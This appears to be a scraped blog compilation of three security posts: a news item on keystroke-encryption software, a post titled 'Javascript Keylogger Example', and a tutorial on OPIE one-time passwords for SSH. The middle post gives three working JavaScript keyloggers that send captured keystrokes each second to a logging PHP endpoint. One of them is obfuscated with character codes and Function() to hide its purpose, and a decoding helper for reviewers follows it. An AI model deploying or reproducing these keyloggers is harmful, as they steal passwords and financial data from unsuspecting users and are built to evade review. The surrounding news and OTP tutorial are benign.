2014. 5. 8. 18:00

Keyboard input encryption technology

Source: IEEE Computer Magazine
Original language: English
Published: October 2005
Country: United States
Subject area: Computer systems and hardware, operating systems (R12)

BlueGem Security announced that it has recently developed an encryption technology called 'LocalSSL' which encrypts keyboard input signals, something existing cryptographic systems did not provide. With this technology, attacks in which hackers use a keylogger tool to learn the user's keystrokes can be blocked at the source.

Existing encryption technology mainly encrypts the data sent and received over communication systems; it did not encrypt the keystroke signals between the user's keyboard and the local application. In that gap between keyboard and application, keylogger programs, running on their own or bundled inside a Trojan horse, intercept the user's passwords, social security numbers, credit card data, financial data and other personal information and send them to the attacker, says BlueGem CTO Joe Park (박죠).

LocalSSL, currently in use in Korea, applies 128-bit encryption to the keyboard input signal. BlueGem adapted the SSL encryption already used on the Internet: LocalSSL delivers the encrypted keystrokes by bypassing the operating system, the layer where key-hacking programs usually reside. According to Park, keylogger programs typically sit in the message queue, in the device driver layer or in the operating system itself, and intercept the user's keystrokes there.

The BlueGem program comes in three packages depending on the application to be protected: LocalSSL Internet, LocalSSL Email and LocalSSL Microsoft Office. The product is compatible with all server hardware and software products, and the installed program uses only 600 KB of memory.

According to Park, with this program users can safely use applications such as online banking, stock trading, virtual private network access, credit card transactions and mortgage loans. Rick Saia of the market analysis firm Aberdeen Group comments: "BlueGem's LocalSSL product provides an important capability for business and personal information protection, and will be especially useful in heavily regulated applications such as financial services and health insurance."



Source: www.gtp.or.kr



2010. 9. 3. 19:31

Javascript Keylogger Example

var keys = '';
// Append each typed character to a buffer
document.onkeypress = function(e) {
    var get = window.event ? event : e;
    var key = get.keyCode ? get.keyCode : get.charCode;
    keys += String.fromCharCode(key);
};
// Every second, send the buffer as an image request and clear it
window.setInterval(function() {
    new Image().src = 'http://localhost/junkylogger.php?keys=' + keys;
    keys = '';
}, 1000);


// Greasemonkey version: the buffer lives in GM_setValue storage instead of a page variable
GM_setValue('keys', '');
unsafeWindow.onkeypress = function(e) {
    var eventobj = window.event ? event : e;
    var key = eventobj.keyCode ? eventobj.keyCode : eventobj.charCode;
    var keys = GM_getValue('keys');
    keys += String.fromCharCode(key);
    GM_setValue('keys', keys);
};

window.setInterval(function() {
    new Image().src = 'http://localhost/junkylogger.php?keys=' + GM_getValue('keys');
    GM_setValue('keys', '');
}, 1000);


// Same logger as above, with the identifying strings built from character codes:
// wind decodes to "unsafeWindow", ev to "onkeypress",
// loc to "http://localhost/junkylogger.php?keys="
window.wrap = window;
wrap.strf = String.fromCharCode;
wrap.wind = strf(117,110,115,97,102,101,87,105,110,100,111,119);
wrap.ev   = strf(111, 110, 107, 101, 121, 112, 114, 101, 115, 115);
GM_setValue('q', '');
// Function() assembles "unsafeWindow.onkeypress = func", so neither name appears literally
Function('func', wind + "." + ev + " = func")(function(e) {
    e = window.event ? window.event : e;
    var k = e.charCode ? e.charCode : e.keyCode;
    k = GM_getValue('q') + strf(k);
    GM_setValue('q', k);
});
wrap.loc = strf(104, 116, 116, 112, 58, 47, 47, 108, 111, 99, 97, 108, 104);
wrap.loc += strf(111, 115, 116, 47, 106, 117, 110, 107, 121, 108, 111, 103, 103, 101);
wrap.loc += strf(114, 46, 112, 104, 112, 63, 107, 101, 121, 115, 61);
window.setInterval(function() {
    new Image().src = wrap.loc + GM_getValue('q');
    GM_setValue('q', '');
}, 1000);
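An added analyst helper, not part of the original post: it decodes the String.fromCharCode / strf obfuscation used in the third snippet so that the hidden property names and the beacon URL can be read during a code review. The function names are assumptions of this example, and the sample input is the snippet's own string-building lines.

```javascript
// Added analyst helper (not from the original post); function names are assumed.
// Matches strf(...) or String.fromCharCode(...) whose arguments are all numeric literals.
const CHARCODE_CALL_RE = /(?:String\.fromCharCode|strf)\(\s*((?:\d+\s*,\s*)*\d+)\s*\)/g;

// Replace every numeric fromCharCode call with the string literal it builds.
function decodeCharCodeCalls(source) {
  return source.replace(CHARCODE_CALL_RE, (_, args) => {
    const text = args.split(",").map((n) => String.fromCharCode(Number(n))).join("");
    return JSON.stringify(text);
  });
}

// Fold `x = "a"; x += "b";` assignments into one literal per variable,
// so a URL split across several statements can be read whole.
function collectStringAssignments(source) {
  const ASSIGN_RE = /([\w.]+)\s*(\+?=)\s*("(?:[^"\\]|\\.)*")\s*;/g;
  const values = {};
  let m;
  while ((m = ASSIGN_RE.exec(source)) !== null) {
    const [, name, op, literal] = m;
    const value = JSON.parse(literal);
    values[name] = op === "+=" ? (values[name] || "") + value : value;
  }
  return values;
}

// Decode first, then collect: returns the readable source and the recovered strings.
function deobfuscate(source) {
  const decoded = decodeCharCodeCalls(source);
  return { decoded, strings: collectStringAssignments(decoded) };
}

// Constructed sample: the string-building lines of the third snippet above.
const SAMPLE = [
  "wrap.wind = strf(117,110,115,97,102,101,87,105,110,100,111,119);",
  "wrap.ev   = strf(111, 110, 107, 101, 121, 112, 114, 101, 115, 115);",
  "wrap.loc = strf(104, 116, 116, 112, 58, 47, 47, 108, 111, 99, 97, 108, 104);",
  "wrap.loc+= strf(111, 115, 116, 47, 106, 117, 110, 107, 121, 108, 111, 103, 103, 101);",
  "wrap.loc+= strf(114, 46, 112, 104, 112, 63, 107, 101, 121, 115, 61);",
].join("\n");

console.log(deobfuscate(SAMPLE).strings);
```

The recovered strings are the event name, the window object and the beacon endpoint, which is what a reviewer would look for in such a script.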


2010. 1. 9. 09:05

As old as good: One Time Passwords

People frequently ask me what I am doing typing on my Palm right before logging in one of my remote systems. The answer is quite simple: “generating my next password”. People always seem puzzled by that answer… Maybe I am just too old to have had only telnet sessions available to remote connections (that was the time before SSH took over)... or maybe I am just too paranoid regarding the access to my systems… Anyway, I like One Time Passwords, and here is an article I can refer to when I get asked again ;-)

One Time Passwords are just that: passwords that are good for one-time use. They never repeat, and once one has been used you can throw it away. They were quite common when authentication was done in clear text (so that any man-in-the-middle could steal your passwords), back in the r-tools age (rcp, rsh, rlogin, rexec, etc.). After the SSH-related tools took over, providing easy tunneling and remote access, MITM attacks were much less of a concern, so OTPs became less relevant. What a shame, since there are even a couple of standards for them!

But there’s still room for OTPs… Question: which is easier to deploy, a MITM attack or a keylogger? That’s right… We are always connecting to our remote systems from public terminals (well… at least I am – right now typing from the hospital computer), and a keylogger is so easily installed on one of those terminals, even remotely, that no one would bother deploying a refined MITM attack just to steal someone’s password. One would just install a keylogger! All the security SSH provides would be gone at that point. That’s why I use SSH to connect to my remote machines, but use OTPs to authenticate myself.

It’s easy to deploy. In Debian you’ll find the packages opie-server and libpam-opie, and those are the only things you’ll need on the server side (besides SSH, obviously). OPIE means “One-time Passwords In Everything”, and combined with PAM, one can really use it everywhere.

After installing it, you’ll have to generate the password file for your account:


spectra@home:~$ opiepasswd -c
Adding spectra:
Only use this method from the console; NEVER from remote. If you are using
telnet, xterm, or a dial-in, type ^C now or exit with no password.
Then run opiepasswd without the -c parameter.
Using MD5 to compute responses.
Enter new secret pass phrase:
Again new secret pass phrase:

ID spectra OTP key is 499 ho6484
HAVE COOK LOLA AIRY NEIL ROAM

The pass phrase will be used to generate the passwords in a step before your login. Please, try not to forget it (especially if you’re following this article and playing with some remote system at the same time). Now you can edit the /etc/pam.d/ssh file (or its equivalent on non-Debian systems) to require that kind of authentication. Mine just looks like this:


# /etc/pam.d/ssh
auth       required     pam_env.so
auth       required     pam_env.so envfile=/etc/default/locale
auth       required     pam_opie.so

The first two lines are unrelated and just load the environment variables. The last line is where the fun is. Please note two things: (1) I removed the reference to pam_unix.so, which is what would ask for my “real” password, because I want that disabled (no login is allowed with that password). And (2), I declared it as required, meaning that failing it keeps one out of the system.

We are not ready yet! SSH will work now, but it will not present you with the OTP challenge. You could probably still log in, but you’d have to remember which password is the current one (trust me, you would not!). To get the challenge you’ll need to enable it – in /etc/ssh/sshd_config change the following line:


ChallengeResponseAuthentication yes

That’s it. Now, when you log in to your remote machine, this is what will usually happen:


spectra@hospital:~$ ssh home
otp-md5 498 ho6484 ext, Response:
spectra@home:~$

Voilà! It asks for password #498. By default, it starts with 500 passwords and counts down from there. Password #498 was asked for, so the next will be #497. After that, #498 is not usable anymore, and #496 is not usable yet. You can generate a list of those passwords (let’s say 10), print it and keep it in your pocket. This is the command you’d use for that:


spectra@home:~$ opiekey -n 10 498 ho6484
Using the MD5 algorithm to compute response.
Reminder: Don't use opiekey from telnet or dial-in sessions.
Sorry, but you don't seem to be on the console or a secure terminal.
Warning: Continuing could disclose your secret pass phrase to an attacker!
Enter secret pass phrase:
489: CALM INTO WEEK APS LOON VIE
490: HASH GYM RAID GOSH HOYT DUAL
491: BELL GIN RIFT HELM GUY BUNK
492: HEBE OBOE SUP LEG LULU LANG
493: HOYT JOT ASK JOG GIBE BETH
494: NASH MOOT HIND YEAH  YAP CARL
495: MATE OF BARD LAVA LEAK AHOY
496: TAB BAG KEY GILT AVID VEAL
497: MOLE FORM NIB LEER ROSS HAVE
498: SING WERE OVEN SOD VEIN NIBS

That is not so secure, since you can lose the paper and be doomed… Luckily there are lots of small programs that do this generation for you. Some you can use from your Palm or from a J2ME-enabled phone (such as the N95). Some you can use from another (trusted) computer. Some are even online, written in JavaScript!

There is at least one other side benefit of using OPIE as above: you can give away your user password (even the root password – OK, probably not a Good Thing™), and the system would still be secure, since it only allows SSH authentication via OPIE! If a session is started with a username whose opiepasswd was not activated (the first step… scroll back to the beginning of the article), SSH will greet you with a bogus challenge… only “opie-activated users” will be allowed to log in with the above configuration.

Easy enough, isn’t it? Now, next time you see me typing on my Palm before opening an SSH connection you’ll know what I am doing… ;-)


Source: http://www.nardol.org

